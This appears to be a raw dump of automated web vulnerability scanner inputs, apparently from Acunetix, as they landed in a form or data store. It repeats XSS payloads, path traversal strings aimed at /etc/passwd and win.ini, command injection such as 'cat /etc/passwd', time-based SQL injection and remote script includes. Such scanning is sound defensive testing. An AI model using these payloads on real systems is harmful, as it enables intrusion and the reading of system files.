1<ScRiPt >prompt(910683)</ScRiPt>

SomeCustomInjectedHeader:injected_by_wvs

1

..\..\..\..\..\..\..\..\windows\win.ini

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

'+response.write(9617478*9087053)+'

1

1<video><source onerror="javascript:prompt(950430)">

SomeCustomInjectedHeader:injected_by_wvs

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

"+response.write(9617478*9087053)+"

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(980329)"></g></svg>

1

1

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<div style=width:expression(prompt(962268))>

1

../../../../../../../../../../etc/passwd.jpg

cat /etc/passwd

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<iframe src='data:text/html

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

`cat /etc/passwd`

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1<body onload=prompt(904498)>

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(951425)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

|cat /etc/passwd#

WEB-INF/web.xml

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<img src=xyz OnErRor=prompt(976541)>

${99059+99247}

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1

1

1

1&n942664=v933614

1some_inexistent_file_with_long_name%00.jpg

1<img/src=">" onerror=alert(936658)>

WEB-INF\web.xml

'|'ld

1

-1)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1<ScRiPt%20>prompt(917636)</sCripT>

-1))

testasp.vulnweb.com

)

1

"|"ld

1

GYF4SWOu'

1

!(()&&!|*|*|

1&lt

/etc/passwd

'"()

g0fAPRqf')

1

1

1

^(#$!@#$)(()))******

'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

\xf6<img acu onmouseover=prompt(987307) //\xf6>

vlJOrloX'))

"

1

1

1

1

1

'

1

${@print(md5(acunetix_wvs_security_test))}

1<input autofocus onfocus=prompt(905324)>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

-1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

${@print(md5(acunetix_wvs_security_test))}\

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

"

<a href='http://www.acunetix.com'>website security</a>

1

1

1

http://hit1k7AxCRReD.bxss.me/

-1)

1

1

[url=http://www.acunetix.com]website security[/url]

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

||cat /etc/passwd

acunetix_wvs_invalid_filename

1

-1))

file:///etc/passwd

1

1_PpdSv <ScRiPt >prompt(992031)</ScRiPt>

1

1

&dir

http://www.acunetix.tst

GRhGpRUF'

'"

1

1'"()&%<ScRiPt >prompt(971838)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

1

UhCSr5GN')

<!--

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(998515)</ScRiPt>

'&dir&'

comments

response.write(9791945*9005369)

1

1

DgBjOQ5E'))

1

1

'+response.write(9791945*9005369)+'

WEB-INF\web.xml

comments

1_988814

1

"&dir&"

1

1

1

"+response.write(9791945*9005369)+"

comments/.

&cat /etc/passwd&

|dir

1

../../../../../../../../../../windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

'|dir

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../boot.ini

1

1

"|dir

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

acu5171\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5171

1

1

../../../../../../../../../../windows/win.ini.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

"|dir

"&cat /etc/passwd&"

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acu5171\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5171

SomeCustomInjectedHeader:injected_by_wvs

"|dir

"&cat /etc/passwd&"

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acu5171\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5171

SomeCustomInjectedHeader:injected_by_wvs

"|dir

"&cat /etc/passwd&"

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acu5171\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5171

1

1

../../../../../../../../../../etc/passwd

cat /etc/passwd

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

if(now()=sysdate(),sleep(31.016),0)/*'XOR(if(now()=sysdate(),sleep(31.016),0))OR'"XOR(if(now()=sysdate(),sleep(31.016),0))OR"*/

acux1642\xc0\xbez1\xc0\xbcz2a\x90bcxuca1642

1

(select(0)from(select(sleep(62.032)))v)/*'+(select(0)from(select(sleep(62.032)))v)+'"+(select(0)from(select(sleep(62.032)))v)+"*/

1

1

../../../../../../../../../../etc/passwd

cat /etc/passwd

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acux1642\xc0\xbez1\xc0\xbcz2a\x90bcxuca1642

1

-1

1

1

../../../../../../../../../../etc/passwd

cat /etc/passwd

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acux1642\xc0\xbez1\xc0\xbcz2a\x90bcxuca1642

-1)

1

-1))

1

1

../../../../../../../../../../etc/passwd

cat /etc/passwd

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acux1642\xc0\xbez1\xc0\xbcz2a\x90bcxuca1642

1

dJG1mQY4'

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

`cat /etc/passwd`

1

1

................windowswin.ini

1

1<ScRiPt >prompt(958026)</ScRiPt>

20CyOTL3')

1

TY8SaocX'))

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

`cat /etc/passwd`

1

1

................windowswin.ini

1<ScRiPt >prompt(958026)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

-1

1<script>prompt(939172)</script>

1

../../../../../../../../../../etc/passwd.jpg

1

${99609+99232}

|cat /etc/passwd#

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<ScRiPt >prompt(990689)</ScRiPt>

1&n915504=v936480

'|'ld

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1))

1

1

1some_inexistent_file_with_long_name%00.jpg

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?955386></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"|"ld

)

fTnvf1rJ'

1<ScRiPt >prompt(933689)</ScRiPt>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

/../..//../..//../..//../..//../..//etc/passwd.jpg

'"()

1<video><source onerror="javascript:prompt(903311)">

CM74WxZQ')

1

testasp.vulnweb.com

!(()&&!|*|*|

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(967120)"></g></svg>

bsqnOY7l'))

'

1

^(#$!@#$)(()))******

1

1

WEB-INF/web.xml

/etc/passwd

1<div style=width:expression(prompt(964537))>

1

1

1

1

"

1<iframe src='data:text/html

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

WEB-INF\web.xml

1

'

||cat /etc/passwd

1<body onload=prompt(952608)>

1

1

"

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(966364)>

1

&dir

${@print(md5(acunetix_wvs_security_test))}

1

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1<img src=xyz OnErRor=prompt(930219)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

'&dir&'

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

1<img/src=">" onerror=alert(902471)>

1

1

acunetix_wvs_invalid_filename

http://hitLM7wGHbESi.bxss.me/

1

"&dir&"

1

file:///etc/passwd

1<ScRiPt%20>prompt(921801)</sCripT>

1

1

1

comments

1

1

1&lt

1

1

1

1

comments

/\../\../\../\../\../\../\../etc/passwd

1

1

\xf6<img acu onmouseover=prompt(911388) //\xf6>

1

comments/.

1

1

WEB-INF/web.xml

1

1

1

|dir

1<input autofocus onfocus=prompt(976257)>

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

WEB-INF\web.xml

1

http://www.acunetix.tst

1

1

'"

<a href='http://www.acunetix.com'>website security</a>

'|dir

1

1

1

1

../../../../../../../../../../windows/win.ini

1

<!--

1

"|dir

1

1

1'"()&%<ScRiPt >prompt(962331)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

'"()&%<ScRiPt >prompt(954214)</ScRiPt>

response.write(9088437*9177960)

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1

1

1_940928

'+response.write(9088437*9177960)+'

1_RY26C <ScRiPt >prompt(980319)</ScRiPt>

&cat /etc/passwd&

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9088437*9177960)+"

................windowswin.ini

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

..\..\..\..\..\..\..\..\windows\win.ini

1

"&cat /etc/passwd&"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

acu2635\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2635

../../../../../../../../../../etc/passwd.jpg

cat /etc/passwd

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

acux7471\xc0\xbez1\xc0\xbcz2a\x90bcxuca7471

`cat /etc/passwd`

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(986034)</ScRiPt>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1

1<script>prompt(929589)</script>

${99768+99426}

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n928057=v945451

'|'ld

-1

1

1

1some_inexistent_file_with_long_name%00.jpg

1

WEB-INF/web.xml

1<ScRiPt >prompt(924301)</ScRiPt>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

)

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1)

1

WEB-INF\web.xml

"|"ld

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?946196></ScRiPt>

!(()&&!|*|*|

testasp.vulnweb.com

-1))

1

/etc/passwd

1

1<ScRiPt >prompt(953503)</ScRiPt>

'"()

1

1

tGV42mJs'

^(#$!@#$)(()))******

1

1<video><source onerror="javascript:prompt(916512)">

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

eBpITgR9')

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(944822)"></g></svg>

1

1

1

FrZeCMwb'))

1<div style=width:expression(prompt(900118))>

1

"

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1

1<iframe src='data:text/html

1

1

||cat /etc/passwd

1

'

-1)

1<body onload=prompt(944395)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(992095)>

1

-1))

&dir

1

1

http://hittwKKgjv8FC.bxss.me/

1

${@print(md5(acunetix_wvs_security_test))}

1<img src=xyz OnErRor=prompt(944206)>

1

'&dir&'

acunetix_wvs_invalid_filename

mdsSUYrr'

1

1

${@print(md5(acunetix_wvs_security_test))}\

1<img/src=">" onerror=alert(923642)>

1

1

1

comments

1

cA5K5h7x')

"&dir&"

1<ScRiPt%20>prompt(987590)</sCripT>

file:///etc/passwd

1

1

1

1

comments

E0McGiLE'))

1

1&lt

1

comments/.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

/\../\../\../\../\../\../\../etc/passwd

http://www.acunetix.tst

1

1

1

\xf6<img acu onmouseover=prompt(907588) //\xf6>

1

1

1

1

1<input autofocus onfocus=prompt(921008)>

|dir

WEB-INF/web.xml

1

1'"()&%<ScRiPt >prompt(992631)</ScRiPt>

'"

1

1

1

'|dir

WEB-INF\web.xml

<a href='http://www.acunetix.com'>website security</a>

1

'"()&%<ScRiPt >prompt(914037)</ScRiPt>

<!--

1

../../../../../../../../../../windows/win.ini

[url=http://www.acunetix.com]website security[/url]

1

1

"|dir

response.write(9222322*9460375)

1_959190

1

1

1_CCf7r <ScRiPt >prompt(918455)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

'+response.write(9222322*9460375)+'

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

"+response.write(9222322*9460375)+"

1

1

&cat /etc/passwd&

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

................windowswin.ini

1

../../../../../../../../../../etc/passwd

1

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

..\..\..\..\..\..\..\..\windows\win.ini

1

1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

acu8155\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8155

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

../../../../../../../../../../etc/passwd.jpg

1

1

acux1261\xc0\xbez1\xc0\xbcz2a\x90bcxuca1261

${99026+99780}

1

1

`cat /etc/passwd`

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(929394)</ScRiPt>

1

if(now()=sysdate(),sleep(9.141),0)/*'XOR(if(now()=sysdate(),sleep(9.141),0))OR'"XOR(if(now()=sysdate(),sleep(9.141),0))OR"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

|cat /etc/passwd#

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<script>prompt(963519)</script>

1

(select(0)from(select(sleep(9.141)))v)/*'+(select(0)from(select(sleep(9.141)))v)+'"+(select(0)from(select(sleep(9.141)))v)+"*/

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1&n912846=v928680

1

'|'ld

1

1some_inexistent_file_with_long_name%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<ScRiPt >prompt(948742)</ScRiPt>

1

-1

1

1

1

"|"ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?911640></ScRiPt>

-1)

WEB-INF/web.xml

)

1

1

testasp.vulnweb.com

1

/etc/passwd

1<ScRiPt >prompt(902172)</ScRiPt>

-1))

WEB-INF\web.xml

'

!(()&&!|*|*|

1

1

1

6dXLZV0r'

1<video><source onerror="javascript:prompt(997199)">

'"()

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

^(#$!@#$)(()))******

"

1

1

x3KWfOKQ')

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(945271)"></g></svg>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

||cat /etc/passwd

1<div style=width:expression(prompt(916709))>

RQbyyAG5'))

1

1

1

1

1

1

&dir

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1

1<iframe src='data:text/html

1

1

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

1<body onload=prompt(982801)>

1

-1)

'&dir&'

1

"

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(954608)>

-1))

"&dir&"

1

http://hit3ex3qUF0To.bxss.me/

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

1

aOFWYCob'

1<img src=xyz OnErRor=prompt(989840)>

file:///etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

|dir

comments

1

1

1<img/src=">" onerror=alert(925652)>

Jbh2Hfc6')

1

/\../\../\../\../\../\../\../etc/passwd

1

1

comments

'|dir

1

1<ScRiPt%20>prompt(925067)</sCripT>

1

1

suG4XKbr'))

WEB-INF/web.xml

1

comments/.

1

"|dir

1&lt

1

WEB-INF\web.xml

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

\xf6<img acu onmouseover=prompt(976284) //\xf6>

1

http://www.acunetix.tst

1

../../../../../../../../../../windows/win.ini

'"

1

1

1<input autofocus onfocus=prompt(919385)>

1

1

../../../../../../../../../../boot.ini

1

<!--

<a href='http://www.acunetix.com'>website security</a>

1'"()&%<ScRiPt >prompt(960603)</ScRiPt>

1

1

1

1

1

1

1

[url=http://www.acunetix.com]website security[/url]

../../../../../../../../../../windows/win.ini.jpg

1

'"()&%<ScRiPt >prompt(914370)</ScRiPt>

1

1

1_ONz25 <ScRiPt >prompt(995377)</ScRiPt>

response.write(9493006*9944400)

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1_947791

1

1

'+response.write(9493006*9944400)+'

1

1

................windowswin.ini

&cat /etc/passwd&

1

1

1

"+response.write(9493006*9944400)+"

..\..\..\..\..\..\..\..\windows\win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1

1

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

"&cat /etc/passwd&"

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

1

1

acu5261\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5261

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

`cat /etc/passwd`

1

1

1

acux2527\xc0\xbez1\xc0\xbcz2a\x90bcxuca2527

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

|cat /etc/passwd#

1

../../../../../../../../../../etc/passwd.jpg

${99550+99483}

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<ScRiPt >prompt(978468)</ScRiPt>

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

'|'ld

WEB-INF/web.xml

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1

1<script>prompt(964713)</script>

1&n978274=v993591

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1some_inexistent_file_with_long_name%00.jpg

WEB-INF\web.xml

"|"ld

-1)

1

)

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<ScRiPt >prompt(969191)</ScRiPt>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

testasp.vulnweb.com

-1))

1

!(()&&!|*|*|

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?984415></ScRiPt>

1

1

ybiPaJDM'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

^(#$!@#$)(()))******

naadtvQI')

'"()

1<ScRiPt >prompt(905338)</ScRiPt>

1

'

1

1

/etc/passwd

N9WAgJf4'))

1

1

1

1<video><source onerror="javascript:prompt(951779)">

1

1

1

"

-1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(925732)"></g></svg>

1

||cat /etc/passwd

1

1

-1)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1<div style=width:expression(prompt(976510))>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

&dir

1

-1))

1

1

1

'

1<iframe src='data:text/html

1

acunetix_wvs_invalid_filename

dXbG9xWH'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

'&dir&'

"

1<body onload=prompt(901386)>

comments

http://hit4OEZjrfTXr.bxss.me/

1

Npsk9Dph')

${@print(md5(acunetix_wvs_security_test))}

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(944240)>

comments

1

"&dir&"

1

1

1<img src=xyz OnErRor=prompt(985746)>

1

file:///etc/passwd

E8YprhVd'))

comments/.

${@print(md5(acunetix_wvs_security_test))}\

1

1

|dir

1

1<img/src=">" onerror=alert(921733)>

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1<ScRiPt%20>prompt(951717)</sCripT>

1

'|dir

1

1

http://www.acunetix.tst

1

1&lt

'"

1

1

1

"|dir

1'"()&%<ScRiPt >prompt(917266)</ScRiPt>

1

<!--

1

1

\xf6<img acu onmouseover=prompt(983326) //\xf6>

1

1

'"()&%<ScRiPt >prompt(904475)</ScRiPt>

1

WEB-INF/web.xml

1

1

1<input autofocus onfocus=prompt(906487)>

1

1

response.write(9263854*9521377)

1

1_953348

WEB-INF\web.xml

1

<a href='http://www.acunetix.com'>website security</a>

'+response.write(9263854*9521377)+'

1

1

[url=http://www.acunetix.com]website security[/url]

"+response.write(9263854*9521377)+"

../../../../../../../../../../windows/win.ini

&cat /etc/passwd&

1_8AH6a <ScRiPt >prompt(948384)</ScRiPt>

1

1

acu6483\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6483

1

1

../../../../../../../../../../boot.ini

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

acux9336\xc0\xbez1\xc0\xbcz2a\x90bcxuca9336

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

"&cat /etc/passwd&"

../../../../../../../../../../windows/win.ini.jpg

if(now()=sysdate(),sleep(14.297),0)/*'XOR(if(now()=sysdate(),sleep(14.297),0))OR'"XOR(if(now()=sysdate(),sleep(14.297),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<ScRiPt >prompt(953234)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

cat /etc/passwd

1

../../../../../../../../../../etc/passwd

(select(0)from(select(sleep(14.297)))v)/*'+(select(0)from(select(sleep(14.297)))v)+'"+(select(0)from(select(sleep(14.297)))v)+"*/

1

1

1

1<script>prompt(903040)</script>

1

`cat /etc/passwd`

................windowswin.ini

-1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

1<ScRiPt >prompt(923751)</ScRiPt>

-1)

|cat /etc/passwd#

1

..\..\..\..\..\..\..\..\windows\win.ini

1

../../../../../../../../../../etc/passwd.jpg

${99633+99305}

1

1

-1))

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?910502></ScRiPt>

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

'|'ld

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

fzx1ir8u'

1&n905558=v929570

1

1

1<ScRiPt >prompt(900684)</ScRiPt>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

jzV4H0mL')

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1some_inexistent_file_with_long_name%00.jpg

"|"ld

1

1<video><source onerror="javascript:prompt(946335)">

b6FhRWaG'))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1

-1

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(934662)"></g></svg>

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

-1)

!(()&&!|*|*|

1<div style=width:expression(prompt(914550))>

'

